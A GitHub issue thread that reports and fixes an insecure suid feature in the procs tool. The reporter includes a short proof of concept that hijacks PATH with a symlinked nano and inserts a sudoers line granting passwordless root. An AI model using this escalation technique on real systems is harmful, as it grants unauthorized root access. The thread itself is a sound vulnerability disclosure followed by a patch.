### ISSUE TITLE
suid feature is insecure

### ISSUE THREAD

**Issue by Jookia** [dalance/procs#38]
The suid feature does not scrub the environment or do permission checks, like sudo does. This means you can elevate your permissions fairly easily provided you can run a suided proc and can make an executable file. Example:

```
baduser@localhost$ (ln -s /usr/bin/nano sudo; PATH=$PWD:$PATH /usr/local/bin/procs --suid)
# edit /etc/sudoers using nano to add "baduser ALL=(ALL:ALL) NOPASSWD: ALL"
baduser@localhost$ sudo id
uid=0(root) gid=0(root) groups=0(root)
```

Suggested fix: Remove the feature and instruct users to use sudo. Perhaps provide an example rule and alias/wrapper like this:

```
root# echo "%admins ALL= NOPASSWD: /usr/local/bin/procs" > /etc/sudoers
root# gpasswd -a myuser admins
myuser$ sudo procs # works
baduser$ sudo procs # fails
```

**Comment by dalance** [comment]
Thank you for your report.
Exactly this is a security vulnerability which can execute arbitrary command as root.

I removed the feature and fixed README.

**Comment by dalance** [comment]
I released v0.9.5 as fixed version.
